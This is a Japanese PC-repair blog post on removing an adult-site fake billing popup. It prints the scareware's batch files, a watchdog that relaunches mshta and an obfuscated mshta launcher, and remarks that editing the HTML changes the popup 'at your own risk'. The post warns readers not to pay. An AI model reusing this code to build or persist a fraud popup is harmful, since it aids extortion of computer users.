広島県安芸郡に訪問サポート修理。
サポート内容
アダルトサイトへのご登録が完了していますので下記をご確認下さいませ。ご利用お知らせ画面がデスクトップに表示されるとご連絡をいただきました。
アダルトご利用通知の駆除
久しぶりにこの手の駆除依頼。一時期、流行っていましたが、ここ最近はめっきり依頼がなかったのでもうなくなったのかと思っていました。それとも、新種の登場か?と少しワクワクしながら作業。
では、駆除開始。以前の駆除方法で、プログラム本体とレジストリ内の情報を検索。ポップアップ表示しているウィンドウ内に駆除する為のヒントあり。
ふむ、進化してない。あっさり見つかる・・・。PCから本体プログラム、レジストリ情報を抹消。
今回、本体プログラムを持って帰ってみた。中身は単純。batファイルからmshatに指定したhtmlデータと、画像を読み込み表示させているだけ。
|
1 2 3 4 5 6 7 8 9 |
@ECHO OFF ping localhost -n 240 > nul for /f %%z in ('tasklist ^| find /C "mshta"') do set COUNT=%%z for /f %%z in ('wmic process get commandline /all ^| find "mshta" ^| find /C "mycon"') do set COUNT=%%z if %COUNT% == 0 goto KICK if %COUNT% == 1 goto KICK exit /b :KICK "C:\ProgramData\mycon\4F8IF84J.bat" |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
@ECHO OFF SET b=s REM AAAA CCCC REM AAAA CCCC REM BBBB DDDD REM REM SET c=h REM AAAA CCCC REM AAAA CCCC REM BBBB DDDD REM REM SET d=t REM AAAA CCCC REM AAAA CCCC REM BBBB DDDD REM REM SET e=a REM AAAA CCCC REM AAAA CCCC REM BBBB DDDD REM REM SET a=m REM AAAA CCCC REM AAAA CCCC REM BBBB DDDD REM REM start %a%%b%%c%%d%%e% "C:\ProgramData\mycon\4F8IF84J.h" |
4F8IF84J.hは、htmlデータです。この中身を変えれば、画像、内容を変える事ができますね。参考までにってことで。これを使って何かあっても一切知りません。自己責任でお願いします。
おわりに
本体プログラムとレジストリ以外に、タスクも調べておきましょう。再起動させたら、また表示されるって場合はタスクに登録され、定期的に自動実行しているかもしれません。
毎回この手の不正プログラムで言う事ですが、お金を払う必要ありません。詐欺ですので、決して電話したり、確認ボタンを押したりしないでください。
お困りでしたら、お気軽にお問い合わせ下さい。対応いたします。
コメント